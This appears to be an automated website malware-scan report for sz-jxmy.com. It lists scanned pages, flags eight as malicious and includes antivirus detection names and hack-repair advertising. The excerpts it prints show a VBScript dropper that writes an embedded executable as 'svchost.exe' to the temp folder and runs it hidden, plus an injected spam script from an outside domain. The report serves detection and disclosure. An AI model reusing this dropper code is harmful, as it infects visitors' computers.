Malware Scanner report for sz-jxmy.com

Malicious/Suspicious/Total urls checked: 8/0/22

8 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "sz-jxmy.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=sz-jxmy.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://sz-jxmy.com/	HTTP/1.1 200 OK Date: Sun, 20 Jul 2014 08:51:03 GMT Accept-Ranges: bytes ETag: "e614939fff9ccf1:bc6a0" Server: Microsoft-IIS/6.0 Content-Length: 188931 Content-Location: http://sz-jxmy.com/index.html Content-Type: text/html Last-Modified: Fri, 11 Jul 2014 11:59:52 GMT	clean
http://sz-jxmy.com/index.html	200 OK Content-Length: 188931 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ...[3623 bytes skipped]... Antivirus reports: Avast VBS:Agent-KZ [Trj] Panda W32/Cosmu.A nProtect Trojan.Dropper.VBS.Q K7AntiVirus Trojan Emsisoft Trojan.Dropper.VBS.Q (B) Comodo TrojWare.VBS.TrojanDropper.Agent.amh DrWeb VBS.Rmnet.2 Kaspersky Trojan-Dropper.VBS.Agent.bp ViRobot VBS.Dropper.B Microsoft Virus:VBS/Ramnit.B MicroWorld-eScan Trojan.Dropper.VBS.Q Fortinet VBS/Dropper.DL!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Agent.bfcghy eSafe VBS.Inor.u F-Prot VBS/Inor.DZ AVG VBS/Heur Norman Ramnit.D GData Trojan.Dropper.VBS.Q Commtouch VBS/Inor.DZ ESET-NOD32 Win32/Ramnit.A BitDefender Trojan.Dropper.VBS.Q
http://www.24383.com/999.js	200 OK Content-Length: 79739 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.writeln("<head>"); document.writeln("<meta http-equiv=\"Content-Type\" content=\"text\/html; charset=gb2312\" \/>"); document.writeln("<title>»Ê¹ÚÍøwww.kfc999.com»Ê¹ÚÏÖ½ð¿ª»§,°Ù¼ÒÀÖ,Ì«Ñô³ÇÓéÀÖ³Ç<\/title>"); document.writeln("<meta name=\"description\" content=\"»Ê¹ÚÍøwww.kfc999.comÊÇÒ»¼Ò×¨Òµ\/È¨ÍþµÄ»Ê¹ÚÏÖ½ðÍø¼°È«Ñ¶Íø,»Ê¹ÚÍøÍÆ¼öÈ«Çò×îºÃµÄ²©²Ê¹«Ë¾,°Ù¼ÒÀÖ,»Ê¹Ú¿ª»§,Ì«Ñô³ÇÓéÀÖ³Ç.ÈÃÄú°²×ø¼ÒÖÐÇáËÉÏíÊÜÍøÉÏÓéÀÖ.\" \/>"); document.writeln("<met ... 3522 bytes are skipped ...); document.writeln(" <\/div>"); document.writeln(""); document.writeln(""); document.writeln(" <\/table>"); document.writeln(" <\/td>"); document.writeln(" <\/tr>"); document.writeln("<\/table>"); document.writeln(""); document.writeln(""); document.writeln(" <\/div>"); document.writeln(""); document.writeln(""); document.writeln(""); document.writeln(" <\/html>") Antivirus reports: NANO-Antivirus Trojan.Url.IframeB.bcfegr
http://sz-jxmy.com/a/shengchansangnaban/	HTTP/1.1 200 OK Date: Sun, 20 Jul 2014 08:51:10 GMT Accept-Ranges: bytes ETag: "4ce36c87ff9ccf1:bc6a0" Server: Microsoft-IIS/6.0 Content-Length: 188374 Content-Location: http://sz-jxmy.com/a/shengchansangnaban/index.html Content-Type: text/html Last-Modified: Fri, 11 Jul 2014 11:59:11 GMT	clean
http://sz-jxmy.com/a/shengchansangnaban/index.html	200 OK Content-Length: 188374 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ...[3622 bytes skipped]... Antivirus reports: Avast VBS:Agent-KZ [Trj] Panda W32/Cosmu.A nProtect Trojan.Dropper.VBS.Q K7AntiVirus Trojan Emsisoft Trojan.Dropper.VBS.Q (B) Comodo TrojWare.VBS.TrojanDropper.Agent.amh DrWeb VBS.Rmnet.2 Kaspersky Trojan-Dropper.VBS.Agent.bp ViRobot VBS.Dropper.B Microsoft Virus:VBS/Ramnit.B MicroWorld-eScan Trojan.Dropper.VBS.Q Fortinet VBS/Dropper.DL!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Agent.bfcghy eSafe VBS.Inor.u F-Prot VBS/Inor.DZ AVG VBS/Heur Norman Ramnit.D GData Trojan.Dropper.VBS.Q Commtouch VBS/Inor.DZ ESET-NOD32 Win32/Ramnit.A BitDefender Trojan.Dropper.VBS.Q
http://sz-jxmy.com/baidu.js	404 Not Found Content-Length: 1308 Content-Type: text/html	clean
http://sz-jxmy.com/test404page.js	404 Not Found Content-Length: 1308 Content-Type: text/html	clean
http://sz-jxmy.com/a/huwaijingguan/	HTTP/1.1 200 OK Date: Sun, 20 Jul 2014 08:51:15 GMT Accept-Ranges: bytes ETag: "cc1fa385ff9ccf1:bc6a0" Server: Microsoft-IIS/6.0 Content-Length: 188113 Content-Location: http://sz-jxmy.com/a/huwaijingguan/index.html Content-Type: text/html Last-Modified: Fri, 11 Jul 2014 11:59:08 GMT	clean
http://sz-jxmy.com/a/huwaijingguan/index.html	200 OK Content-Length: 188113 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ...[3625 bytes skipped]... Antivirus reports: Avast VBS:Agent-KZ [Trj] Panda W32/Cosmu.A nProtect Trojan.Dropper.VBS.Q K7AntiVirus Trojan Emsisoft Trojan.Dropper.VBS.Q (B) Comodo TrojWare.VBS.TrojanDropper.Agent.amh DrWeb VBS.Rmnet.2 Kaspersky Trojan-Dropper.VBS.Agent.bp ViRobot VBS.Dropper.B Microsoft Virus:VBS/Ramnit.B MicroWorld-eScan Trojan.Dropper.VBS.Q Fortinet VBS/Dropper.DL!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Agent.bfcghy eSafe VBS.Inor.u F-Prot VBS/Inor.DZ AVG VBS/Heur Norman Ramnit.D GData Trojan.Dropper.VBS.Q Commtouch VBS/Inor.DZ ESET-NOD32 Win32/Ramnit.A BitDefender Trojan.Dropper.VBS.Q
http://sz-jxmy.com/a/fangfumuxilie/	HTTP/1.1 200 OK Date: Sun, 20 Jul 2014 08:51:19 GMT Accept-Ranges: bytes ETag: "5ab01185ff9ccf1:bc6a0" Server: Microsoft-IIS/6.0 Content-Length: 188164 Content-Location: http://sz-jxmy.com/a/fangfumuxilie/index.html Content-Type: text/html Last-Modified: Fri, 11 Jul 2014 11:59:08 GMT	clean
http://sz-jxmy.com/a/fangfumuxilie/index.html	200 OK Content-Length: 188164 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ...[3622 bytes skipped]... Antivirus reports: Avast VBS:Agent-KZ [Trj] Panda W32/Cosmu.A nProtect Trojan.Dropper.VBS.Q K7AntiVirus Trojan Emsisoft Trojan.Dropper.VBS.Q (B) Comodo TrojWare.VBS.TrojanDropper.Agent.amh DrWeb VBS.Rmnet.2 Kaspersky Trojan-Dropper.VBS.Agent.bp ViRobot VBS.Dropper.B Microsoft Virus:VBS/Ramnit.B MicroWorld-eScan Trojan.Dropper.VBS.Q Fortinet VBS/Dropper.DL!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Agent.bfcghy eSafe VBS.Inor.u F-Prot VBS/Inor.DZ AVG VBS/Heur Norman Ramnit.D GData Trojan.Dropper.VBS.Q Commtouch VBS/Inor.DZ ESET-NOD32 Win32/Ramnit.A BitDefender Trojan.Dropper.VBS.Q
http://sz-jxmy.com/a/jianadaxiangbai/	HTTP/1.1 200 OK Date: Sun, 20 Jul 2014 08:51:21 GMT Accept-Ranges: bytes ETag: "8689b086ff9ccf1:bc6a0" Server: Microsoft-IIS/6.0 Content-Length: 188352 Content-Location: http://sz-jxmy.com/a/jianadaxiangbai/index.html Content-Type: text/html Last-Modified: Fri, 11 Jul 2014 11:59:10 GMT	clean
http://sz-jxmy.com/a/jianadaxiangbai/index.html	200 OK Content-Length: 188352 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ... 3078 bytes are skipped ...00000000000000000000000000000000000" Set FSO = CreateObject("Scripting.FileSystemObject") DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName If FSO.FileExists(DropPath)=False Then Set FileObj = FSO.CreateTextFile(DropPath, True) For i = 1 To Len(WriteData) Step 2 FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2))) Next FileObj.Close End If Set WSHshell = CreateObject("WScript.Shell") WSHshell.Run DropPath, 0 //--> Antivirus reports: Avast VBS:Agent-KZ [Trj] Panda W32/Cosmu.A nProtect Trojan.Dropper.VBS.Q K7AntiVirus Trojan Emsisoft Trojan.Dropper.VBS.Q (B) Comodo TrojWare.VBS.TrojanDropper.Agent.amh DrWeb VBS.Rmnet.2 Kaspersky Trojan-Dropper.VBS.Agent.bp ViRobot VBS.Dropper.B Microsoft Virus:VBS/Ramnit.B MicroWorld-eScan Trojan.Dropper.VBS.Q Fortinet VBS/Dropper.DL!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Agent.bfcghy eSafe VBS.Inor.u F-Prot VBS/Inor.DZ AVG VBS/Heur Norman Ramnit.D GData Trojan.Dropper.VBS.Q Commtouch VBS/Inor.DZ ESET-NOD32 Win32/Ramnit.A BitDefender Trojan.Dropper.VBS.Q
http://sz-jxmy.com/a/jianadatieshan/	HTTP/1.1 200 OK Date: Sun, 20 Jul 2014 08:51:24 GMT Accept-Ranges: bytes ETag: "821b086ff9ccf1:bc6a0" Server: Microsoft-IIS/6.0 Content-Length: 186517 Content-Location: http://sz-jxmy.com/a/jianadatieshan/index.html Content-Type: text/html Last-Modified: Fri, 11 Jul 2014 11:59:09 GMT	clean
http://sz-jxmy.com/a/jianadatieshan/index.html	200 OK Content-Length: 186517 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B80000000000000040000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ...[3623 bytes skipped]... Antivirus reports: Avast VBS:Agent-KZ [Trj] Panda W32/Cosmu.A nProtect Trojan.Dropper.VBS.Q K7AntiVirus Trojan Emsisoft Trojan.Dropper.VBS.Q (B) Comodo TrojWare.VBS.TrojanDropper.Agent.amh DrWeb VBS.Rmnet.2 Kaspersky Trojan-Dropper.VBS.Agent.bp ViRobot VBS.Dropper.B Microsoft Virus:VBS/Ramnit.B MicroWorld-eScan Trojan.Dropper.VBS.Q Fortinet VBS/Dropper.DL!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Agent.bfcghy eSafe VBS.Inor.u F-Prot VBS/Inor.DZ AVG VBS/Heur Norman Ramnit.D GData Trojan.Dropper.VBS.Q Commtouch VBS/Inor.DZ ESET-NOD32 Win32/Ramnit.A BitDefender Trojan.Dropper.VBS.Q
http://sz-jxmy.com/a/miandianxiangbai/	HTTP/1.1 200 OK Date: Sun, 20 Jul 2014 08:51:27 GMT Accept-Ranges: bytes ETag: "7a99187ff9ccf1:bc6a0" Server: Microsoft-IIS/6.0 Content-Length: 185719 Content-Location: http://sz-jxmy.com/a/miandianxiangbai/index.html Content-Type: text/html Last-Modified: Fri, 11 Jul 2014 11:59:11 GMT	clean
http://sz-jxmy.com/a/miandianxiangbai/index.html	200 OK Content-Length: 185719 Content-Type: text/html	malicious
Malicious code - confirmed by antiviruses (see below) <!-- DropFileName = "svchost.exe" WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 ...[3624 bytes skipped]... Antivirus reports: Avast VBS:Agent-KZ [Trj] Panda W32/Cosmu.A nProtect Trojan.Dropper.VBS.Q K7AntiVirus Trojan Emsisoft Trojan.Dropper.VBS.Q (B) Comodo TrojWare.VBS.TrojanDropper.Agent.amh DrWeb VBS.Rmnet.2 Kaspersky Trojan-Dropper.VBS.Agent.bp ViRobot VBS.Dropper.B Microsoft Virus:VBS/Ramnit.B MicroWorld-eScan Trojan.Dropper.VBS.Q Fortinet VBS/Dropper.DL!tr Jiangmin Trojan/Script.Gen NANO-Antivirus Trojan.Script.Agent.bfcghy eSafe VBS.Inor.u F-Prot VBS/Inor.DZ AVG VBS/Heur Norman Ramnit.D GData Trojan.Dropper.VBS.Q Commtouch VBS/Inor.DZ ESET-NOD32 Win32/Ramnit.A BitDefender Trojan.Dropper.VBS.Q
http://sz-jxmy.com/tags.php?/%C4%A7%D3%F2%CB%BD%B7%FE%B7%A2%B2%BC%CD%F8/	404 Not Found Content-Length: 1308 Content-Type: text/html	clean
http://sz-jxmy.com/tags.php?/%B6%C4%C7%F2%CD%F8%D5%BE/	404 Not Found Content-Length: 1308 Content-Type: text/html	clean
http://sz-jxmy.com/tags.php?/%CC%AB%D1%F4%B3%C7%B9%D9%CD%F8/	404 Not Found Content-Length: 1308 Content-Type: text/html	clean
http://sz-jxmy.com/tags.php?/%BB%CA%B9%DA%CD%F8%B6%C4%C7%F2/	404 Not Found Content-Length: 1308 Content-Type: text/html	clean
http://sz-jxmy.com/tags.php?/%B4%AB%C6%E6%CB%BD%B7%FE%CD%F8%D5%BE/	404 Not Found Content-Length: 1308 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: sz-jxmy.com

Result:
HTTP/1.1 200 OK
Date: Sun, 20 Jul 2014 08:51:03 GMT
Accept-Ranges: bytes
ETag: "e614939fff9ccf1:bc6a0"
Server: Microsoft-IIS/6.0
Content-Length: 188931
Content-Location: http://sz-jxmy.com/index.html
Content-Type: text/html
Last-Modified: Fri, 11 Jul 2014 11:59:52 GMT

...188931 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: sz-jxmy.com
Referer: http://www.google.com/search?q=sz-jxmy.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for sz-jxmy.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools